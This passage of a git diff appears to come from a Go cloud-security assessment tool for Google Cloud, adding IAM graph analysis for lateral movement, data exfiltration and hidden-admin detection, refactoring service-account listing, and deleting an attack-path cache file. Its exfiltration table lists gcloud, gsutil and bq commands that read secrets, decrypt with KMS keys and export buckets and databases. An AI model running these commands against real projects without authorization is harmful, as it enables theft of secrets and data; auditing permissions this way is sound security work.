"serviceAccount", + AccessType: "via_privesc", + ViaEdge: true, + }) + } + } + } + + if len(principals) > 0 { + findings = append(findings, LateralFinding{ + Technique: name, + Permission: tech.Permission, + Category: tech.Category, + Description: tech.Description, + Exploitation: tech.Exploitation, + Principals: principals, + }) + } + } + + return findings +} + +// DataExfilTechnique defines a data exfiltration technique +type DataExfilTechnique struct { + Permission string + Description string + Exploitation string + Service string +} + +// GetDataExfilTechniques returns all data exfiltration techniques +func GetDataExfilTechniques() map[string]DataExfilTechnique { + return map[string]DataExfilTechnique{ + // Storage + "gcs_objects_get": { + Permission: "storage.objects.get", + Description: "Can download objects from GCS buckets", + Exploitation: "gsutil cp gs://BUCKET/path/to/file ./local/", + Service: "storage", + }, + "gcs_objects_list": { + Permission: "storage.objects.list", + Description: "Can list objects in GCS buckets", + Exploitation: "gsutil ls -r gs://BUCKET/", + Service: "storage", + }, + // BigQuery + "bq_data_get": { + Permission: "bigquery.tables.getData", + Description: "Can read BigQuery table data", + Exploitation: "bq query 'SELECT * FROM dataset.table'", + Service: "bigquery", + }, + "bq_tables_export": { + Permission: "bigquery.tables.export", + Description: "Can export BigQuery tables to GCS", + Exploitation: "bq extract dataset.table gs://BUCKET/export.csv", + Service: "bigquery", + }, + // Cloud SQL + "cloudsql_export": { + Permission: "cloudsql.instances.export", + Description: "Can export Cloud SQL databases", + Exploitation: "gcloud sql export sql INSTANCE gs://BUCKET/export.sql --database=DB", + Service: "cloudsql", + }, + "cloudsql_connect": { + Permission: "cloudsql.instances.connect", + Description: "Can connect to Cloud SQL instances", + Exploitation: "gcloud sql connect INSTANCE --user=root", + Service: "cloudsql", + }, + // Secrets + "secrets_access": { + Permission: "secretmanager.versions.access", + Description: "Can access secret values", + Exploitation: "gcloud secrets versions access latest --secret=SECRET", + Service: "secretmanager", + }, + // KMS + "kms_decrypt": { + Permission: "cloudkms.cryptoKeyVersions.useToDecrypt", + Description: "Can decrypt data using KMS keys", + Exploitation: "gcloud kms decrypt --key=KEY --keyring=KEYRING --location=LOCATION --ciphertext-file=encrypted.bin --plaintext-file=decrypted.txt", + Service: "kms", + }, + // Logging + "logging_read": { + Permission: "logging.logEntries.list", + Description: "Can read log entries (may contain sensitive data)", + Exploitation: "gcloud logging read 'logName=\"projects/PROJECT/logs/LOG\"'", + Service: "logging", + }, + // Pub/Sub + "pubsub_receive": { + Permission: "pubsub.subscriptions.consume", + Description: "Can receive messages from Pub/Sub subscriptions", + Exploitation: "gcloud pubsub subscriptions pull SUBSCRIPTION --auto-ack", + Service: "pubsub", + }, + // Compute disk snapshots + "snapshot_useReadOnly": { + Permission: "compute.snapshots.useReadOnly", + Description: "Can use disk snapshots to create disks", + Exploitation: "gcloud compute disks create DISK --source-snapshot=SNAPSHOT", + Service: "compute", + }, + } +} + +// DataExfilFinding represents a data exfiltration finding +type DataExfilFinding struct { + Technique string `json:"technique"` + Permission string `json:"permission"` + Service string `json:"service"` + Description string `json:"description"` + Exploitation string `json:"exploitation"` + Principals []PrincipalAccess `json:"principals"` +} + +// AnalyzeDataExfil analyzes data exfiltration opportunities using graph data +// This is equivalent to running "foxmapper gcp query preset data-exfil" +// If pre-computed findings exist (data_exfil_findings.json), uses those. +// Otherwise falls back to edge-based analysis. +func (s *FoxMapperService) AnalyzeDataExfil(service string) []DataExfilFinding { + if !s.initialized { + return nil + } + + // Use pre-computed findings from FoxMapper if available + if s.DataExfilFindingsData != nil && len(s.DataExfilFindingsData.Findings) > 0 { + return s.analyzeDataExfilFromFindings(service) + } + + // Fallback to edge-based analysis (legacy behavior) + return s.analyzeDataExfilFromEdges(service) +} + +// analyzeDataExfilFromFindings uses pre-computed findings from data_exfil_findings.json +func (s *FoxMapperService) analyzeDataExfilFromFindings(service string) []DataExfilFinding { + var findings []DataExfilFinding + + for _, f := range s.DataExfilFindingsData.Findings { + // Filter by service if specified + if service != "" && f.Service != service { + continue + } + + // Convert file format to internal format + var principals []PrincipalAccess + for _, p := range f.Principals { + principals = append(principals, PrincipalAccess{ + Principal: p.Principal, + MemberID: p.MemberID, + MemberType: p.MemberType, + IsAdmin: p.IsAdmin, + IsServiceAccount: p.IsServiceAccount, + AccessType: p.AccessType, + ViaEdge: p.ViaEdge, + EdgePath: p.EdgePath, + }) + } + + if len(principals) > 0 { + findings = append(findings, DataExfilFinding{ + Technique: f.Technique, + Permission: f.Permission, + Service: f.Service, + Description: f.Description, + Exploitation: f.Exploitation, + Principals: principals, + }) + } + } + + return findings +} + +// analyzeDataExfilFromEdges is the legacy edge-based analysis (fallback) +func (s *FoxMapperService) analyzeDataExfilFromEdges(service string) []DataExfilFinding { + var findings []DataExfilFinding + techniques := GetDataExfilTechniques() + + for name, tech := range techniques { + // Filter by service if specified + if service != "" && tech.Service != service { + continue + } + + // Find principals with this permission via edges + var principals []PrincipalAccess + for _, edge := range s.Edges { + // Check if edge grants this permission + if strings.Contains(strings.ToLower(edge.Reason), strings.ToLower(tech.Permission)) || + strings.Contains(edge.ShortReason, tech.Permission) { + node := s.GetNode(edge.Source) + if node != nil { + principals = append(principals, PrincipalAccess{ + Principal: node.Email, + MemberID: node.MemberID, + MemberType: node.MemberType, + IsAdmin: node.IsAdmin, + IsServiceAccount: node.MemberType == "serviceAccount", + AccessType: "via_privesc", + ViaEdge: true, + }) + } + } + } + + if len(principals) > 0 { + findings = append(findings, DataExfilFinding{ + Technique: name, + Permission: tech.Permission, + Service: tech.Service, + Description: tech.Description, + Exploitation: tech.Exploitation, + Principals: principals, + }) + } + } + + return findings +} + +// GetAllNodes returns all nodes in the graph +func (s *FoxMapperService) GetAllNodes() []Node { + return s.Nodes +} + +// GetAllEdges returns all edges in the graph +func (s *FoxMapperService) GetAllEdges() []Edge { + return s.Edges +} + +// GetPolicies returns all policies in the graph +func (s *FoxMapperService) GetPolicies() []Policy { + return s.Policies +} + +// ========================================== +// Wrong Admin (Hidden Admin) Analysis +// ========================================== + +// WrongAdminFinding represents a principal marked as admin without explicit admin roles +type WrongAdminFinding struct { + Principal string `json:"principal"` + MemberType string `json:"member_type"` + AdminLevel string `json:"admin_level"` // org, folder, project + Reasons []string `json:"reasons"` + ProjectID string `json:"project_id"` +} + +// ADMIN_ROLES are roles that grant explicit admin access +var ADMIN_ROLES = map[string]bool{ + "roles/owner": true, +} + +// SELF_ASSIGNMENT_ROLES are roles that can grant themselves admin access +var SELF_ASSIGNMENT_ROLES = map[string]bool{ + "roles/resourcemanager.projectIamAdmin": true, + "roles/resourcemanager.folderAdmin": true, + "roles/resourcemanager.organizationAdmin": true, + "roles/iam.securityAdmin": true, + "roles/iam.organizationRoleAdmin": true, +} + +// AnalyzeWrongAdmins finds principals marked as admin without explicit admin roles +// This is equivalent to running "foxmapper gcp query preset wrongadmin" +func (s *FoxMapperService) AnalyzeWrongAdmins() []WrongAdminFinding { + if !s.initialized { + return nil + } + + var findings []WrongAdminFinding + + for i := range s.Nodes { + node := &s.Nodes[i] + + // Skip non-admins + if !node.IsAdmin { + continue + } + + // Check if they have explicit admin role (roles/owner) + if s.hasExplicitAdminRole(node) { + continue + } + + // This is a "wrong admin" - get reasons why they're admin + reasons := s.getAdminReasons(node) + + finding := WrongAdminFinding{ + Principal: node.Email, + MemberType: node.MemberType, + AdminLevel: node.AdminLevel, + Reasons: reasons, + ProjectID: node.ProjectID, + } + + if finding.AdminLevel == "" { + finding.AdminLevel = "project" + } + + findings = append(findings, finding) + } + + // Sort by admin level (org > folder > project) + sort.Slice(findings, func(i, j int) bool { + levelOrder := map[string]int{"org": 0, "folder": 1, "project": 2} + li, ok := levelOrder[findings[i].AdminLevel] + if !ok { + li = 3 + } + lj, ok := levelOrder[findings[j].AdminLevel] + if !ok { + lj = 3 + } + if li != lj { + return li < lj + } + return findings[i].Principal < findings[j].Principal + }) + + return findings +} + +// hasExplicitAdminRole checks if a node has roles/owner directly +func (s *FoxMapperService) hasExplicitAdminRole(node *Node) bool { + for _, policy := range s.Policies { + for _, binding := range policy.Bindings { + if !ADMIN_ROLES[binding.Role] { + continue + } + + for _, member := range binding.Members { + if s.memberMatchesNode(member, node) { + // Check for conditions - conditional admin is "wrong" admin + if binding.Condition != nil && len(binding.Condition) > 0 { + return false + } + return true + } + } + } + } + return false +} + +// memberMatchesNode checks if a member string matches a node +func (s *FoxMapperService) memberMatchesNode(member string, node *Node) bool { + memberLower := strings.ToLower(member) + nodeMemberLower := strings.ToLower(node.MemberID) + + // Direct match + if memberLower == nodeMemberLower { + return true + } + + // Check group memberships + if strings.HasPrefix(member, "group:") && len(node.GroupMemberships) > 0 { + groupEmail := strings.ToLower(strings.SplitN(member, ":", 2)[1]) + for _, gm := range node.GroupMemberships { + if strings.ToLower(gm) == groupEmail || strings.ToLower(gm) == memberLower { + return true + } + } + } + + return false +} + +// getAdminReasons returns reasons why a node is marked as admin +func (s *FoxMapperService) getAdminReasons(node *Node) []string { + var reasons []string + + for _, policy := range s.Policies { + policyLevel := s.getPolicyLevel(policy.Resource) + + for _, binding := range policy.Bindings { + if !SELF_ASSIGNMENT_ROLES[binding.Role] { + continue + } + + for _, member := range binding.Members { + if s.memberMatchesNode(member, node) { + conditionNote := "" + if binding.Condition != nil && len(binding.Condition) > 0 { + conditionNote = " (conditional)" + } + + switch binding.Role { + case "roles/resourcemanager.projectIamAdmin": + reasons = append(reasons, fmt.Sprintf( + "Has %s on %s%s - can set project IAM policy (grant themselves roles/owner)", + binding.Role, policy.Resource, conditionNote)) + case "roles/resourcemanager.folderAdmin": + reasons = append(reasons, fmt.Sprintf( + "Has %s on %s%s - can set folder IAM policy (grant themselves roles/owner at folder level)", + binding.Role, policy.Resource, conditionNote)) + case "roles/resourcemanager.organizationAdmin": + reasons = append(reasons, fmt.Sprintf( + "Has %s on %s%s - can set organization IAM policy (grant themselves roles/owner at org level)", + binding.Role, policy.Resource, conditionNote)) + case "roles/iam.securityAdmin": + reasons = append(reasons, fmt.Sprintf( + "Has %s on %s%s - can set IAM policies at %s level", + binding.Role, policy.Resource, conditionNote, policyLevel)) + case "roles/iam.organizationRoleAdmin": + reasons = append(reasons, fmt.Sprintf( + "Has %s on %s%s - can create/modify roles and has organization setIamPolicy", + binding.Role, policy.Resource, conditionNote)) + default: + reasons = append(reasons, fmt.Sprintf( + "Has %s on %s%s", binding.Role, policy.Resource, conditionNote)) + } + break + } + } + } + } + + // Check for custom roles with setIamPolicy permissions + for _, policy := range s.Policies { + for _, binding := range policy.Bindings { + // Skip standard roles we already checked + if SELF_ASSIGNMENT_ROLES[binding.Role] || ADMIN_ROLES[binding.Role] { + continue + } + + // Check if it's a custom role + if strings.HasPrefix(binding.Role, "projects/") || strings.HasPrefix(binding.Role, "organizations/") { + for _, member := range binding.Members { + if s.memberMatchesNode(member, node) { + roleLower := strings.ToLower(binding.Role) + if strings.Contains(roleLower, "admin") || strings.Contains(roleLower, "iam") { + reasons = append(reasons, fmt.Sprintf( + "Has custom role %s on %s - may grant setIamPolicy permissions", + binding.Role, policy.Resource)) + } + break + } + } + } + } + } + + if len(reasons) == 0 { + reasons = append(reasons, fmt.Sprintf( + "Marked as %s admin but couldn't determine specific role - may be due to inherited permissions or group membership", + node.AdminLevel)) + } + + return reasons +} + +// getPolicyLevel determines the level of a policy resource +func (s *FoxMapperService) getPolicyLevel(resource string) string { + if strings.HasPrefix(resource, "organizations/") { + return "organization" + } else if strings.HasPrefix(resource, "folders/") { + return "folder" + } + return "project" +} diff --git a/gcp/services/iamService/iamService.go b/gcp/services/iamService/iamService.go index 0ddee81b..f5737acb 100644 --- a/gcp/services/iamService/iamService.go +++ b/gcp/services/iamService/iamService.go @@ -403,8 +403,18 @@ func contains(slice []string, item string) bool { return false } -// ServiceAccounts retrieves all service accounts in a project with detailed info +// ServiceAccounts retrieves all service accounts in a project with detailed info (including keys) func (s *IAMService) ServiceAccounts(projectID string) ([]ServiceAccountInfo, error) { + return s.serviceAccountsInternal(projectID, true) +} + +// ServiceAccountsBasic retrieves service accounts without querying keys (faster, fewer permissions needed) +func (s *IAMService) ServiceAccountsBasic(projectID string) ([]ServiceAccountInfo, error) { + return s.serviceAccountsInternal(projectID, false) +} + +// serviceAccountsInternal retrieves service accounts with optional key enumeration +func (s *IAMService) serviceAccountsInternal(projectID string, includeKeys bool) ([]ServiceAccountInfo, error) { ctx := context.Background() iamService, err := s.getIAMService(ctx) if err != nil { @@ -428,24 +438,26 @@ func (s *IAMService) ServiceAccounts(projectID string) ([]ServiceAccountInfo, er OAuth2ClientID: sa.Oauth2ClientId, } - // Get keys for this service account - keys, err := s.getServiceAccountKeys(ctx, iamService, sa.Name) - if err != nil { - // Log but don't fail - we might not have permission - parsedErr := gcpinternal.ParseGCPError(err, "iam.googleapis.com") - gcpinternal.HandleGCPError(parsedErr, logger, globals.GCP_IAM_MODULE_NAME, - fmt.Sprintf("Could not list keys for %s", sa.Email)) - } else { - saInfo.Keys = keys - // Count user-managed keys only - userManagedCount := 0 - for _, key := range keys { - if key.KeyType == "USER_MANAGED" { - userManagedCount++ + // Get keys for this service account (only if requested) + if includeKeys { + keys, err := s.getServiceAccountKeys(ctx, iamService, sa.Name) + if err != nil { + // Log but don't fail - we might not have permission + parsedErr := gcpinternal.ParseGCPError(err, "iam.googleapis.com") + gcpinternal.HandleGCPError(parsedErr, logger, globals.GCP_IAM_MODULE_NAME, + fmt.Sprintf("Could not list keys for %s", sa.Email)) + } else { + saInfo.Keys = keys + // Count user-managed keys only + userManagedCount := 0 + for _, key := range keys { + if key.KeyType == "USER_MANAGED" { + userManagedCount++ + } } + saInfo.KeyCount = userManagedCount + saInfo.HasKeys = userManagedCount > 0 } - saInfo.KeyCount = userManagedCount - saInfo.HasKeys = userManagedCount > 0 } serviceAccounts = append(serviceAccounts, saInfo) @@ -711,8 +723,8 @@ func (s *IAMService) CombinedIAM(projectID string) (CombinedIAMData, error) { } data.Principals = principals - // Get service accounts with details - serviceAccounts, err := s.ServiceAccounts(projectID) + // Get service accounts (without keys - use ServiceAccounts() if keys needed) + serviceAccounts, err := s.ServiceAccountsBasic(projectID) if err != nil { // Don't fail completely gcpinternal.HandleGCPError(err, logger, globals.GCP_IAM_MODULE_NAME, @@ -819,6 +831,65 @@ func GetMemberType(member string) string { return determinePrincipalType(member) } +// GetRolesForServiceAccount returns all roles assigned to a service account in a project +// This includes both direct project-level bindings and inherited bindings from folders/org +func (s *IAMService) GetRolesForServiceAccount(projectID string, saEmail string) ([]string, error) { + // Get all bindings with inheritance + bindings, err := s.PoliciesWithInheritance(projectID) + if err != nil { + return nil, err + } + + // Find roles for this service account + saFullIdentifier := "serviceAccount:" + saEmail + rolesSet := make(map[string]bool) + + for _, binding := range bindings { + for _, member := range binding.Members { + if member == saFullIdentifier { + rolesSet[binding.Role] = true + } + } + } + + // Convert to slice + var roles []string + for role := range rolesSet { + roles = append(roles, role) + } + + return roles, nil +} + +// FormatRolesShort formats roles for compact table display +// Extracts just the role name from the full path and abbreviates common prefixes +func FormatRolesShort(roles []string) string { + if len(roles) == 0 { + return "-" + } + + var shortRoles []string + for _, role := range roles { + // Extract role name from full path + shortRole := role + + // Handle different role formats + if strings.HasPrefix(role, "roles/") { + shortRole = strings.TrimPrefix(role, "roles/") + } else if strings.Contains(role, "/roles/") { + // Custom role: projects/xxx/roles/MyRole or organizations/xxx/roles/MyRole + parts := strings.Split(role, "/roles/") + if len(parts) == 2 { + shortRole = parts[1] + " (custom)" + } + } + + shortRoles = append(shortRoles, shortRole) + } + + return strings.Join(shortRoles, ", ") +} + // PermissionEntry represents a single permission with its source information type PermissionEntry struct { Permission string `json:"permission"` @@ -1398,8 +1469,8 @@ func (s *IAMService) GetServiceAccountIAMPolicy(ctx context.Context, saEmail str func (s *IAMService) GetAllServiceAccountImpersonation(projectID string) ([]SAImpersonationInfo, error) { ctx := context.Background() - // Get all service accounts - serviceAccounts, err := s.ServiceAccounts(projectID) + // Get all service accounts (without keys - impersonation analysis doesn't need them) + serviceAccounts, err := s.ServiceAccountsBasic(projectID) if err != nil { return nil, err } @@ -1424,8 +1495,8 @@ func (s *IAMService) GetAllServiceAccountImpersonation(projectID string) ([]SAIm func (s *IAMService) ServiceAccountsWithImpersonation(projectID string) ([]ServiceAccountInfo, error) { ctx := context.Background() - // Get base service account info - serviceAccounts, err := s.ServiceAccounts(projectID) + // Get base service account info (without keys - impersonation analysis doesn't need them) + serviceAccounts, err := s.ServiceAccountsBasic(projectID) if err != nil { return nil, err } @@ -1880,8 +1951,8 @@ func (s *IAMService) CombinedIAMEnhanced(ctx context.Context, projectIDs []strin // Get service accounts and custom roles for each project for _, projectID := range projectIDs { - // Service accounts - serviceAccounts, err := s.ServiceAccounts(projectID) + // Service accounts (without keys) + serviceAccounts, err := s.ServiceAccountsBasic(projectID) if err == nil { data.ServiceAccounts = append(data.ServiceAccounts, serviceAccounts...) } diff --git a/go.mod b/go.mod index b46a1634..dd9b1238 100644 --- a/go.mod +++ b/go.mod @@ -143,7 +143,6 @@ require ( require ( cloud.google.com/go/asset v1.22.0 cloud.google.com/go/kms v1.23.2 - cloud.google.com/go/logging v1.13.1 cloud.google.com/go/monitoring v1.24.3 cloud.google.com/go/pubsub v1.50.1 cloud.google.com/go/securitycenter v1.38.1 diff --git a/internal/gcp/attackpath_cache.go b/internal/gcp/attackpath_cache.go deleted file mode 100644 index aa2293b3..00000000 --- a/internal/gcp/attackpath_cache.go +++ /dev/null @@ -1,545 +0,0 @@ -package gcpinternal - -import ( - "context" - "fmt" - "strings" - "sync" -) - -// AttackPathType represents the type of attack path -type AttackPathType string - -const ( - AttackPathPrivesc AttackPathType = "privesc" - AttackPathExfil AttackPathType = "exfil" - AttackPathLateral AttackPathType = "lateral" -) - -// AttackPathCache holds cached attack path analysis results for all types -// This allows modules to quickly check if a service account or principal has -// privesc/exfil/lateral movement potential without re-running the full analysis -type AttackPathCache struct { - // ServiceAccountPaths maps service account email -> PathType -> methods - // Example: "sa@project.iam.gserviceaccount.com" -> "privesc" -> [methods...] - ServiceAccountPaths map[string]map[AttackPathType][]AttackMethod - - // PrincipalPaths maps any principal (user, group, SA) -> PathType -> methods - // This includes the full principal string like "serviceAccount:sa@project.iam.gserviceaccount.com" - PrincipalPaths map[string]map[AttackPathType][]AttackMethod - - // Quick lookups by attack type for summary stats - PrivescCount int - ExfilCount int - LateralCount int - - // Populated indicates whether the cache has been populated with data - Populated bool - - // RawAttackPathData stores the complete attack path results for modules that need full details - // This avoids re-enumeration when privesc module runs after --attack-paths flag - RawAttackPathData interface{} - - mu sync.RWMutex -} - -// AttackMethod represents a single attack method (privesc, exfil, or lateral) -type AttackMethod struct { - Method string // e.g., "CreateServiceAccountKey", "ExportCloudSQL" - PathType AttackPathType // "privesc", "exfil", "lateral" - Category string // e.g., "SA Impersonation", "Database", "Network" - RiskLevel string // "CRITICAL", "HIGH", "MEDIUM" - Target string // What the method targets - Permissions []string // Permissions that enable this method - ScopeType string // "organization", "folder", "project", "resource" - ScopeID string // The scope identifier -} - -// NewAttackPathCache creates a new empty attack path cache -func NewAttackPathCache() *AttackPathCache { - return &AttackPathCache{ - ServiceAccountPaths: make(map[string]map[AttackPathType][]AttackMethod), - PrincipalPaths: make(map[string]map[AttackPathType][]AttackMethod), - Populated: false, - } -} - -// AddAttackPath adds an attack path to the cache -// principal should be the full member string (e.g., "serviceAccount:sa@project.iam.gserviceaccount.com") -func (c *AttackPathCache) AddAttackPath(principal string, method AttackMethod) { - c.mu.Lock() - defer c.mu.Unlock() - - // Initialize maps if needed - if c.PrincipalPaths[principal] == nil { - c.PrincipalPaths[principal] = make(map[AttackPathType][]AttackMethod) - } - c.PrincipalPaths[principal][method.PathType] = append(c.PrincipalPaths[principal][method.PathType], method) - - // Update counts - switch method.PathType { - case AttackPathPrivesc: - c.PrivescCount++ - case AttackPathExfil: - c.ExfilCount++ - case AttackPathLateral: - c.LateralCount++ - } - - // If it's a service account, also add to the SA-specific map - if strings.HasPrefix(principal, "serviceAccount:") { - email := strings.TrimPrefix(principal, "serviceAccount:") - if c.ServiceAccountPaths[email] == nil { - c.ServiceAccountPaths[email] = make(map[AttackPathType][]AttackMethod) - } - c.ServiceAccountPaths[email][method.PathType] = append(c.ServiceAccountPaths[email][method.PathType], method) - } - - // Also check if the principal itself looks like an email (for cleaned member names) - if strings.Contains(principal, "@") && strings.Contains(principal, ".iam.gserviceaccount.com") { - if c.ServiceAccountPaths[principal] == nil { - c.ServiceAccountPaths[principal] = make(map[AttackPathType][]AttackMethod) - } - c.ServiceAccountPaths[principal][method.PathType] = append(c.ServiceAccountPaths[principal][method.PathType], method) - } -} - -// MarkPopulated marks the cache as populated -func (c *AttackPathCache) MarkPopulated() { - c.mu.Lock() - defer c.mu.Unlock() - c.Populated = true -} - -// IsPopulated returns whether the cache has been populated -func (c *AttackPathCache) IsPopulated() bool { - c.mu.RLock() - defer c.mu.RUnlock() - return c.Populated -} - -// HasAttackPath checks if a service account has any attack path of the specified type -// Returns (hasPath bool, methods []AttackMethod) -func (c *AttackPathCache) HasAttackPath(serviceAccount string, pathType AttackPathType) (bool, []AttackMethod) { - c.mu.RLock() - defer c.mu.RUnlock() - - // Check direct match - if pathMap, ok := c.ServiceAccountPaths[serviceAccount]; ok { - if methods, ok := pathMap[pathType]; ok && len(methods) > 0 { - return true, methods - } - } - - // Check with serviceAccount: prefix - prefixed := "serviceAccount:" + serviceAccount - if pathMap, ok := c.PrincipalPaths[prefixed]; ok { - if methods, ok := pathMap[pathType]; ok && len(methods) > 0 { - return true, methods - } - } - - return false, nil -} - -// HasAnyAttackPath checks if a service account has any attack path of any type -// Returns (hasPath bool, pathTypes []AttackPathType) -func (c *AttackPathCache) HasAnyAttackPath(serviceAccount string) (bool, []AttackPathType) { - c.mu.RLock() - defer c.mu.RUnlock() - - var pathTypes []AttackPathType - - // Check direct match - if pathMap, ok := c.ServiceAccountPaths[serviceAccount]; ok { - for pt, methods := range pathMap { - if len(methods) > 0 { - pathTypes = append(pathTypes, pt) - } - } - } - - // Check with serviceAccount: prefix if no direct match - if len(pathTypes) == 0 { - prefixed := "serviceAccount:" + serviceAccount - if pathMap, ok := c.PrincipalPaths[prefixed]; ok { - for pt, methods := range pathMap { - if len(methods) > 0 { - pathTypes = append(pathTypes, pt) - } - } - } - } - - return len(pathTypes) > 0, pathTypes -} - -// HasPrivesc checks if a service account has any privilege escalation potential -// Backward compatible with old PrivescCache API -func (c *AttackPathCache) HasPrivesc(serviceAccount string) (bool, []AttackMethod) { - return c.HasAttackPath(serviceAccount, AttackPathPrivesc) -} - -// HasExfil checks if a service account has any data exfiltration potential -func (c *AttackPathCache) HasExfil(serviceAccount string) (bool, []AttackMethod) { - return c.HasAttackPath(serviceAccount, AttackPathExfil) -} - -// HasLateral checks if a service account has any lateral movement potential -func (c *AttackPathCache) HasLateral(serviceAccount string) (bool, []AttackMethod) { - return c.HasAttackPath(serviceAccount, AttackPathLateral) -} - -// HasAttackPathForPrincipal checks if any principal (user, group, SA) has attack path potential -func (c *AttackPathCache) HasAttackPathForPrincipal(principal string, pathType AttackPathType) (bool, []AttackMethod) { - c.mu.RLock() - defer c.mu.RUnlock() - - if pathMap, ok := c.PrincipalPaths[principal]; ok { - if methods, ok := pathMap[pathType]; ok && len(methods) > 0 { - return true, methods - } - } - - return false, nil -} - -// HasPrivescForPrincipal checks if any principal has privesc potential -// Backward compatible with old PrivescCache API -func (c *AttackPathCache) HasPrivescForPrincipal(principal string) (bool, []AttackMethod) { - return c.HasAttackPathForPrincipal(principal, AttackPathPrivesc) -} - -// GetAllAttackPathsForPrincipal returns all attack paths for a principal across all types -func (c *AttackPathCache) GetAllAttackPathsForPrincipal(principal string) map[AttackPathType][]AttackMethod { - c.mu.RLock() - defer c.mu.RUnlock() - - if pathMap, ok := c.PrincipalPaths[principal]; ok { - // Return a copy to avoid race conditions - result := make(map[AttackPathType][]AttackMethod) - for pt, methods := range pathMap { - result[pt] = append([]AttackMethod{}, methods...) - } - return result - } - - return nil -} - -// GetAttackSummary returns a summary string for a service account's attack potential -// Returns: "Yes (P:3 E:2 L:1)" for counts by type, "No" if none, "-" if cache not populated -func (c *AttackPathCache) GetAttackSummary(serviceAccount string) string { - if !c.IsPopulated() { - return "-" - } - - hasAny, pathTypes := c.HasAnyAttackPath(serviceAccount) - if !hasAny { - return "No" - } - - var parts []string - for _, pt := range pathTypes { - _, methods := c.HasAttackPath(serviceAccount, pt) - if len(methods) > 0 { - switch pt { - case AttackPathPrivesc: - parts = append(parts, fmt.Sprintf("P:%d", len(methods))) - case AttackPathExfil: - parts = append(parts, fmt.Sprintf("E:%d", len(methods))) - case AttackPathLateral: - parts = append(parts, fmt.Sprintf("L:%d", len(methods))) - } - } - } - - if len(parts) == 0 { - return "No" - } - - return "Yes (" + strings.Join(parts, " ") + ")" -} - -// GetPrivescSummary returns a summary string for privesc only (backward compatible) -func (c *AttackPathCache) GetPrivescSummary(serviceAccount string) string { - if !c.IsPopulated() { - return "-" - } - - hasPrivesc, methods := c.HasPrivesc(serviceAccount) - if !hasPrivesc || len(methods) == 0 { - return "No" - } - - return "Yes" -} - -// GetPrivescSummaryWithCount returns a summary with count (backward compatible) -func (c *AttackPathCache) GetPrivescSummaryWithCount(serviceAccount string) string { - if !c.IsPopulated() { - return "-" - } - - hasPrivesc, methods := c.HasPrivesc(serviceAccount) - if !hasPrivesc || len(methods) == 0 { - return "No" - } - - uniqueMethods := make(map[string]bool) - for _, m := range methods { - uniqueMethods[m.Method] = true - } - - return fmt.Sprintf("Yes (%d)", len(uniqueMethods)) -} - -// GetHighestRiskLevel returns the highest risk level for a service account across all attack types -func (c *AttackPathCache) GetHighestRiskLevel(serviceAccount string) string { - c.mu.RLock() - defer c.mu.RUnlock() - - riskOrder := map[string]int{"CRITICAL": 3, "HIGH": 2, "MEDIUM": 1, "LOW": 0} - highestRisk := "" - highestOrder := -1 - - // Check all path types - for _, pathType := range []AttackPathType{AttackPathPrivesc, AttackPathExfil, AttackPathLateral} { - hasPath, methods := c.HasAttackPath(serviceAccount, pathType) - if !hasPath { - continue - } - for _, m := range methods { - if order, ok := riskOrder[m.RiskLevel]; ok && order > highestOrder { - highestOrder = order - highestRisk = m.RiskLevel - } - } - } - - return highestRisk -} - -// GetMethodNames returns a list of unique method names for a service account by attack type -func (c *AttackPathCache) GetMethodNames(serviceAccount string, pathType AttackPathType) []string { - hasPath, methods := c.HasAttackPath(serviceAccount, pathType) - if !hasPath { - return nil - } - - uniqueMethods := make(map[string]bool) - var result []string - for _, m := range methods { - if !uniqueMethods[m.Method] { - uniqueMethods[m.Method] = true - result = append(result, m.Method) - } - } - - return result -} - -// AttackPathInfo is a minimal representation of an attack path for cache population -// This allows the cache to be populated without importing the service packages -type AttackPathInfo struct { - Principal string - PrincipalType string - Method string - PathType AttackPathType - Category string - RiskLevel string - Target string - Permissions []string - ScopeType string - ScopeID string -} - -// PopulateFromPaths populates the cache from a list of attack path info -func (c *AttackPathCache) PopulateFromPaths(paths []AttackPathInfo) { - for _, path := range paths { - method := AttackMethod{ - Method: path.Method, - PathType: path.PathType, - Category: path.Category, - RiskLevel: path.RiskLevel, - Target: path.Target, - Permissions: path.Permissions, - ScopeType: path.ScopeType, - ScopeID: path.ScopeID, - } - - // Build the full principal string - principal := path.Principal - if path.PrincipalType == "serviceAccount" && !strings.HasPrefix(principal, "serviceAccount:") { - principal = "serviceAccount:" + principal - } else if path.PrincipalType == "user" && !strings.HasPrefix(principal, "user:") { - principal = "user:" + principal - } else if path.PrincipalType == "group" && !strings.HasPrefix(principal, "group:") { - principal = "group:" + principal - } - - c.AddAttackPath(principal, method) - } - c.MarkPopulated() -} - -// GetStats returns statistics about the cache -func (c *AttackPathCache) GetStats() (privesc, exfil, lateral int) { - c.mu.RLock() - defer c.mu.RUnlock() - return c.PrivescCount, c.ExfilCount, c.LateralCount -} - -// SetRawData stores the complete attack path data for modules that need full details -// This is used to avoid re-enumeration when running privesc after --attack-paths flag -func (c *AttackPathCache) SetRawData(data interface{}) { - c.mu.Lock() - defer c.mu.Unlock() - c.RawAttackPathData = data -} - -// GetRawData retrieves the complete attack path data -// Returns nil if no raw data is stored -func (c *AttackPathCache) GetRawData() interface{} { - c.mu.RLock() - defer c.mu.RUnlock() - return c.RawAttackPathData -} - -// HasRawData returns true if raw attack path data is available -func (c *AttackPathCache) HasRawData() bool { - c.mu.RLock() - defer c.mu.RUnlock() - return c.RawAttackPathData != nil -} - -// GetImpersonationTargets returns service accounts that a principal can impersonate -// Looks for SA Impersonation category methods where the target SA is stored in ScopeID -func (c *AttackPathCache) GetImpersonationTargets(principal string) []string { - c.mu.RLock() - defer c.mu.RUnlock() - - var targets []string - seen := make(map[string]bool) - - // Check all path types for SA Impersonation category - checkPaths := func(pathMap map[AttackPathType][]AttackMethod) { - for _, methods := range pathMap { - for _, m := range methods { - if m.Category == "SA Impersonation" && m.ScopeID != "" { - // ScopeID contains the target SA email when ScopeType is "resource" - if m.ScopeType == "resource" && strings.Contains(m.ScopeID, "@") { - if !seen[m.ScopeID] { - seen[m.ScopeID] = true - targets = append(targets, m.ScopeID) - } - } - } - } - } - } - - // Check by principal email (for service accounts) - if pathMap, ok := c.ServiceAccountPaths[principal]; ok { - checkPaths(pathMap) - } - - // Check with serviceAccount: prefix - prefixed := "serviceAccount:" + principal - if pathMap, ok := c.PrincipalPaths[prefixed]; ok { - checkPaths(pathMap) - } - - // Check direct principal match - if pathMap, ok := c.PrincipalPaths[principal]; ok { - checkPaths(pathMap) - } - - return targets -} - -// GetTargetsForMethod returns targets for a specific attack method -// This is useful for finding what resources a principal can access via specific permissions -func (c *AttackPathCache) GetTargetsForMethod(principal string, methodName string) []string { - c.mu.RLock() - defer 